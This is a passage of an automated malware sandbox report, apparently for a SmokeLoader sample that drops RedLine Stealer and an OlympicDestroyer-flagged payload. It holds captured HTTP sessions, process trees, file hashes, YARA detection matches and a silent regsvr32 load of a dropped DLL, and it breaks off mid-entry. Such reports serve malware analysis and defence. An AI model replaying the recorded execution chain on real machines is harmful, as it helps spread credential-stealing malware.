{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zl%2FxsF63bdilhgvPeDbBokEVWm8XMgt8Ye7AmXmb4GvpawigEkGFBwWFxG%2F7XvvVv8OHc6bWWD3to9kVIl9rjvKbs5FbI0lFPKPgOIL9qYE%2F8nV9dEwjUA0Pp%2F3YcQE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83a7ea169bdb0345-MIA alt-svc: h3=":443"; ma=86400
2023-12-24 09:45:57 UTC	122	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2023-12-24 09:45:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49763	209.87.209.205	443	3524	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-24 09:45:58 UTC	122	OUT	GET / HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: zonealarm.com Connection: Keep-Alive Cache-Control: no-cache
2023-12-24 09:45:58 UTC	254	IN	HTTP/1.1 301 Moved Permanently Date: Sun, 24 Dec 2023 09:45:57 GMT Server: Apache Location: http://www.zonealarm.com/ Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 Connection: close Strict-Transport-Security: max-age=15552000
2023-12-24 09:45:58 UTC	233	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 7a 6f 6e 65 61 6c 61 72 6d 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.zonealarm.com/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49767	185.85.15.47	443	3524	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-24 09:46:01 UTC	126	OUT	GET / HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: www.kaspersky.com Connection: Keep-Alive Cache-Control: no-cache
2023-12-24 09:46:01 UTC	189	IN	HTTP/1.1 302 Moved Temporarily Server: nginx Date: Sun, 24 Dec 2023 09:46:01 GMT Content-Type: text/html Content-Length: 138 Connection: close Location: https://usa.kaspersky.com/
2023-12-24 09:46:01 UTC	138	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49768	185.85.15.46	443	3524	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-24 09:46:02 UTC	126	OUT	GET / HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Connection: Keep-Alive Cache-Control: no-cache Host: usa.kaspersky.com
2023-12-24 09:46:03 UTC	760	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 24 Dec 2023 09:46:03 GMT Content-Type: text/html; charset=utf-8 Content-Length: 367826 Connection: close Vary: Accept-Encoding x-platform: siterenderer x-server: FRATCMWEB5 X-Powered-By: Next.js ETag: "8bi9dpq21w7vfj" Cache-Control: max-age=600 Vary: Accept-Encoding Expires: Sun, 24 Dec 2023 09:56:03 GMT X-Request-Id: fb7f6f544fa5aa7fc324cc8695ccb0ab Set-Cookie: country=US;Path=/;Max-Age=3600;Secure;SameSite=None X-Proxy: fra1 Strict-Transport-Security: max-age=31536000; includeSubDomains Referrer-Policy: no-referrer-when-downgrade X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self'; X-Cached: HIT
2023-12-24 09:46:03 UTC	15624	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 70 72 6f 6d 6f 2d 69 64 3d 22 63 66 39 32 65 66 66 22 20 64 61 74 61 2d 64 6f 6d 61 69 6e 3d 22 75 73 61 22 20 64 61 74 61 2d 6e 6f 2d 67 74 6d 3d 22 66 61 6c 73 65 22 20 64 61 74 61 2d 6e 6f 2d 6d 61 78 79 6d 69 73 65 72 3d 22 66 61 6c 73 65 22 20 64 61 74 61 2d 6e 6f 2d 6f 6d 6e 69 74 75 72 65 3d 22 66 61 6c 73 65 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6e 65 78 74 2d 68 65 61 Data Ascii: <!DOCTYPE html><html lang="en" data-promo-id="cf92eff" data-domain="usa" data-no-gtm="false" data-no-maxymiser="false" data-no-omniture="false" dir="ltr"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><meta name="next-hea
2023-12-24 09:46:03 UTC	16384	IN	Data Raw: 65 2e 30 31 65 63 30 32 61 34 33 36 65 37 36 33 31 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 33 6b 77 62 33 30 33 76 65 73 67 31 6d 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 73 69 74 65 72 65 6e 64 65 72 65 72 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 36 37 34 31 2e 63 34 33 35 34 33 64 36 34 31 32 62 61 34 64 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 33 6b 77 62 33 30 33 76 65 73 67 31 6d 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 73 69 74 65 72 65 6e 64 65 72 65 72 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 32 32 Data Ascii: e.01ec02a436e7631d.js"></script><script defer="" src="https://d3kwb303vesg1m.cloudfront.net/siterenderer/_next/static/chunks/6741.c43543d6412ba4d9.js"></script><script defer="" src="https://d3kwb303vesg1m.cloudfront.net/siterenderer/_next/static/chunks/22
2023-12-24 09:46:03 UTC	16384	IN	Data Raw: 35 2e 31 34 20 31 20 2e 31 34 20 31 2e 35 5a 6d 2d 31 35 20 30 63 30 2d 2e 35 2e 30 36 2d 31 20 2e 31 35 2d 31 2e 35 68 32 2e 31 38 61 31 36 2e 33 33 20 31 36 2e 33 33 20 30 20 30 20 30 20 30 20 33 48 31 2e 39 39 63 2d 2e 31 2d 2e 35 2d 2e 31 34 2d 31 2d 2e 31 35 2d 31 2e 35 5a 6d 33 2e 37 35 20 30 63 30 2d 2e 35 2e 30 33 2d 31 20 2e 30 39 2d 31 2e 35 68 32 2e 39 31 76 33 48 35 2e 36 38 63 2d 2e 30 36 2d 2e 35 2d 2e 30 38 2d 31 2d 2e 30 39 2d 31 2e 35 5a 6d 34 2e 35 2d 37 2e 33 34 63 31 2e 31 39 2e 35 20 32 2e 31 39 20 32 2e 31 37 20 32 2e 36 38 20 34 2e 33 34 48 31 30 2e 31 56 31 2e 37 5a 6d 2d 31 2e 35 20 30 76 34 2e 33 34 48 35 2e 39 32 43 36 2e 34 32 20 33 2e 38 37 20 37 2e 34 31 20 32 2e 32 20 38 2e 36 20 31 2e 37 5a 6d 30 20 31 30 2e 33 34 76 34 2e Data Ascii: 5.14 1 .14 1.5Zm-15 0c0-.5.06-1 .15-1.5h2.18a16.33 16.33 0 0 0 0 3H1.99c-.1-.5-.14-1-.15-1.5Zm3.75 0c0-.5.03-1 .09-1.5h2.91v3H5.68c-.06-.5-.08-1-.09-1.5Zm4.5-7.34c1.19.5 2.19 2.17 2.68 4.34H10.1V1.7Zm-1.5 0v4.34H5.92C6.42 3.87 7.41 2.2 8.6 1.7Zm0 10.34v4.
2023-12-24 09:46:03 UTC	16384	IN	Data Raw: 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 41 63 63 65 73 69 62 69 6c 69 74 79 42 75 74 74 6f 6e 5f 62 75 74 74 6f 6e 5f 5f 72 6a 5f 65 6a 20 43 6f 75 6e 74 72 79 53 65 6c 65 63 74 6f 72 4c 69 73 74 5f 68 69 64 64 65 6e 5f 5f 69 48 41 63 4d 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e c2 a0 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 73 65 63 74 69 6f 6e 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 42 42 42 5f 6f 76 65 72 6c 61 79 5f 5f 42 4e 65 39 54 22 3e 3c 2f 64 69 76 3e 3c 2f 68 65 61 64 65 72 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 41 6e 63 68 6f 72 42 61 73 65 5f 63 6f 6e 74 61 69 6e 65 72 5f 5f 65 41 7a 41 6d 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 6f 70 3a 2d 30 70 78 22 20 Data Ascii: tton" class="AccesibilityButton_button__rj_ej CountrySelectorList_hidden__iHAcM" aria-hidden="true"></button></section></div></div><div class="HeaderBBB_overlay__BNe9T"></div></header></div><div class="AnchorBase_container__eAzAm"><div style="top:-0px"
2023-12-24 09:46:03 UTC	16384	IN	Data Raw: 6d 2e 73 76 67 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 62 61 73 65 6c 69 6e 65 49 6d 61 67 65 22 20 63 6c 61 73 73 3d 22 50 72 6f 64 75 63 74 5f 69 63 6f 6e 5f 5f 52 56 46 57 68 20 53 69 6e 67 6c 65 50 72 6f 64 75 63 74 5f 69 63 6f 6e 5f 5f 36 4a 52 35 63 22 20 61 6c 74 3d 22 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 2f 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 50 72 6f 64 75 63 74 5f 6e 61 6d 65 5f 5f 77 6f 4f 74 74 20 53 69 6e 67 6c 65 50 72 6f 64 75 63 74 5f 6e 61 6d 65 5f 5f 37 30 6b 76 77 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 50 72 6f 64 75 63 74 5f 6e 61 6d 65 4c 69 6e 65 5f 5f 4a 56 42 56 35 22 3e 4b 61 73 70 65 72 73 6b 79 20 50 72 65 6d 69 75 6d 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 53 69 6e Data Ascii: m.svg" data-testid="baselineImage" class="Product_icon__RVFWh SingleProduct_icon__6JR5c" alt="" role="presentation"/><span class="Product_name__woOtt SingleProduct_name__70kvw"><span class="Product_nameLine__JVBV5">Kaspersky Premium</span><span class="Sin
2023-12-24 09:46:04 UTC	16384	IN	Data Raw: 42 75 79 42 6c 6f 63 6b 43 6f 6c 75 6d 6e 46 65 61 74 75 72 65 73 22 20 63 6c 61 73 73 3d 22 4d 61 74 63 68 48 65 69 67 68 74 5f 6d 61 78 57 69 64 74 68 31 30 30 5f 5f 63 70 61 57 5f 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 70 65 6e 42 75 79 42 6c 6f 63 6b 43 6f 6c 75 6d 6e 5f 63 6f 6c 75 6d 6e 46 65 61 74 75 72 65 73 5f 5f 56 31 32 7a 71 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 4f 70 65 6e 42 75 79 42 6c 6f 63 6b 43 6f 6c 75 6d 6e 46 65 61 74 75 72 65 73 5f 66 65 61 74 75 72 65 73 57 72 61 70 70 65 72 5f 5f 36 50 51 6b 5f 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 66 65 61 74 75 72 65 20 69 73 20 49 6e 63 6c 75 64 65 64 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 4c 69 73 74 Data Ascii: BuyBlockColumnFeatures" class="MatchHeight_maxWidth100__cpaW_"><div style="max-width:100%"><div class="OpenBuyBlockColumn_columnFeatures__V12zq"><ul class="OpenBuyBlockColumnFeatures_featuresWrapper__6PQk_" aria-label="feature is Included"><li class="List
2023-12-24 09:46:04 UTC	16384	IN	Data Raw: 72 2f 62 61 2f 62 61 30 65 65 33 31 39 31 37 39 30 61 66 66 35 32 34 66 37 62 34 66 61 36 36 30 35 66 32 38 36 2f 70 72 6f 63 65 73 73 65 64 2f 70 72 6f 64 75 63 74 2d 62 6f 78 2d 6b 73 6b 2d 32 2e 73 76 67 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 62 61 73 65 6c 69 6e 65 49 6d 61 67 65 22 20 63 6c 61 73 73 3d 22 50 72 6f 64 75 63 74 5f 69 63 6f 6e 5f 5f 52 56 46 57 68 20 42 6f 74 74 6f 6d 50 72 6f 64 75 63 74 5f 69 63 6f 6e 5f 5f 6b 49 55 53 6b 22 20 61 6c 74 3d 22 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 2f 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 50 72 6f 64 75 63 74 5f 6e 61 6d 65 5f 5f 77 6f 4f 74 74 20 42 6f 74 74 6f 6d 50 72 6f 64 75 63 74 5f 6e 61 6d 65 5f 5f 31 77 61 30 61 22 3e 4b 61 73 70 65 72 73 6b 79 20 53 61 66 65 Data Ascii: r/ba/ba0ee3191790aff524f7b4fa6605f286/processed/product-box-ksk-2.svg" data-testid="baselineImage" class="Product_icon__RVFWh BottomProduct_icon__kIUSk" alt="" role="presentation"/><span class="Product_name__woOtt BottomProduct_name__1wa0a">Kaspersky Safe
2023-12-24 09:46:04 UTC	16384	IN	Data Raw: 35 36 2d 32 34 39 2e 35 34 7a 22 3e 3c 2f 70 61 74 68 3e 3c 2f 73 76 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 49 74 65 6d 5f 69 6e 66 6f 5f 5f 6c 6c 51 4d 63 20 49 74 65 6d 5f 69 6e 66 6f 57 69 74 68 43 6f 6e 74 65 6e 74 5f 5f 35 71 55 33 63 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 49 74 65 6d 5f 61 75 74 68 6f 72 5f 5f 4c 73 5f 51 54 22 3e 42 65 72 6e 69 65 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 64 61 74 61 2d 69 6e 64 65 78 3d 22 33 22 20 63 6c 61 73 73 3d 22 53 6c 69 64 65 72 5f 69 74 65 6d 5f 5f 48 41 6b 62 68 22 20 61 72 69 61 2d 72 6f 6c 65 64 65 73 63 Data Ascii: 56-249.54z"></path></svg></span></div></div><div class="Item_info__llQMc Item_infoWithContent__5qU3c"><div class="Item_author__Ls_QT">Bernie</div></div></div></div></div></div><div aria-hidden="true" data-index="3" class="Slider_item__HAkbh" aria-roledesc
2023-12-24 09:46:04 UTC	16384	IN	Data Raw: 6d 20 43 61 72 64 5f 6f 6e 65 54 68 69 72 64 5f 5f 36 50 68 6b 55 20 43 61 72 64 5f 67 72 69 64 5f 5f 73 50 48 30 45 22 20 64 61 74 61 2d 61 74 2d 73 65 6c 65 63 74 6f 72 3d 22 6d 65 64 69 61 2d 63 61 72 64 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 54 65 78 74 43 61 72 64 5f 69 6d 61 67 65 5f 5f 51 45 4c 52 37 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 62 61 73 65 6c 69 6e 65 49 6d 61 67 65 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 64 33 6b 77 62 33 30 33 76 65 73 67 31 6d 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 73 65 2f 63 6f 6d 2f 63 6f 6e 74 65 6e 74 2f 65 6e 2d 67 6c 6f 62 61 6c 2f 69 6d 61 67 65 73 2f 62 61 73 65 6c 69 6e 65 2f 6d 65 64 69 61 2d 63 61 72 64 73 2f 65 6e Data Ascii: m Card_oneThird__6PhkU Card_grid__sPH0E" data-at-selector="media-card"><div class="TextCard_image__QELR7" data-testid="baselineImage" style="background-image:url(https://d3kwb303vesg1m.cloudfront.net/se/com/content/en-global/images/baseline/media-cards/en
2023-12-24 09:46:04 UTC	16384	IN	Data Raw: 2e 36 37 2d 2e 36 35 2e 38 38 2d 32 2e 31 32 2e 38 38 2d 32 2e 31 32 61 33 31 2e 32 37 20 33 31 2e 32 37 20 30 20 30 20 30 20 2e 32 32 2d 33 2e 34 35 76 2d 31 2e 36 32 61 33 31 2e 33 20 33 31 2e 33 20 30 20 30 20 30 2d 2e 32 32 2d 33 2e 34 35 5a 4d 39 2e 37 33 20 31 35 2e 33 33 76 2d 36 6c 35 2e 39 34 20 33 2e 30 31 2d 35 2e 39 34 20 32 2e 39 39 5a 22 3e 3c 2f 70 61 74 68 3e 3c 2f 73 76 67 3e 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 2f 6b 61 73 70 65 72 73 6b 79 6c 61 62 22 20 63 6c 61 73 73 3d 22 46 6f 6f 74 65 72 42 42 42 5f 73 6f 63 69 61 6c 4c 69 6e 6b 5f 5f 4b 63 57 6f 35 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 72 65 66 65 72 72 65 72 22 20 61 72 69 61 2d Data Ascii: .67-.65.88-2.12.88-2.12a31.27 31.27 0 0 0 .22-3.45v-1.62a31.3 31.3 0 0 0-.22-3.45ZM9.73 15.33v-6l5.94 3.01-5.94 2.99Z"></path></svg></a><a href="https://instagram.com/kasperskylab" class="FooterBBB_socialLink__KcWo5" target="_blank" rel="noreferrer" aria-

Target ID:	0
Start time:	10:43:47
Start date:	24/12/2023
Path:	C:\Users\user\Desktop\16GAuqLUFK.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\16GAuqLUFK.exe
Imagebase:	0x400000
File size:	352'256 bytes
MD5 hash:	FCD15E71512E00AF86732FB04281CF03
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2042153672.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2042498408.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2042498408.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2042178550.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2042178550.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.1978169987.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2042284755.000000000050D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:43:53
Start date:	24/12/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	10:44:12
Start date:	24/12/2023
Path:	C:\Users\user\AppData\Roaming\eieeggj
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\eieeggj
Imagebase:	0x400000
File size:	352'256 bytes
MD5 hash:	FCD15E71512E00AF86732FB04281CF03
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2280019076.0000000001FB1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2280019076.0000000001FB1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000003.2228963618.0000000000490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2279751170.0000000000490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2279751170.0000000000490000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2279733437.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2279823208.00000000004BC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 70%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:44:22
Start date:	24/12/2023
Path:	C:\Users\user\AppData\Local\Temp\820.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\820.exe
Imagebase:	0x400000
File size:	2'017'792 bytes
MD5 hash:	EE1049D8F8248D11080582FE27F96843
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2342067283.00000000051FA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 91%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:44:24
Start date:	24/12/2023
Path:	C:\Users\user\AppData\Local\Temp\820.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\820.exe
Imagebase:	0x400000
File size:	2'017'792 bytes
MD5 hash:	EE1049D8F8248D11080582FE27F96843
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	10:44:24
Start date:	24/12/2023
Path:	C:\Users\user\AppData\Local\Temp\16E6.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\16E6.exe
Imagebase:	0x400000
File size:	1'031'168 bytes
MD5 hash:	54B4A6C4422FD983F901A346072DC89F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: OlympicDestroyer_1, Description: OlympicDestroyer Payload, Source: 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2704339035.0000000002309000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: OlympicDestroyer_1, Description: OlympicDestroyer Payload, Source: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Author: kevoreilly
Antivirus matches:	Detection: 43%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:44:25
Start date:	24/12/2023
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	10:44:26
Start date:	24/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5340 -ip 5340
Imagebase:	0xd40000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:44:26
Start date:	24/12/2023
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 /s C:\Users\user\AppData\Local\Temp\1C75.dll
Imagebase:	0x7ff7cedd0000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:44:26
Start date:	24/12/2023
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	/s C:\Users\user\AppData\Local\Temp\1C75.dll
Imagebase:	0x290000
File size:	20'992 bytes
MD5 hash:	878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:44:26
Start date:	24/12/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 716
Imagebase:	0xd40000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
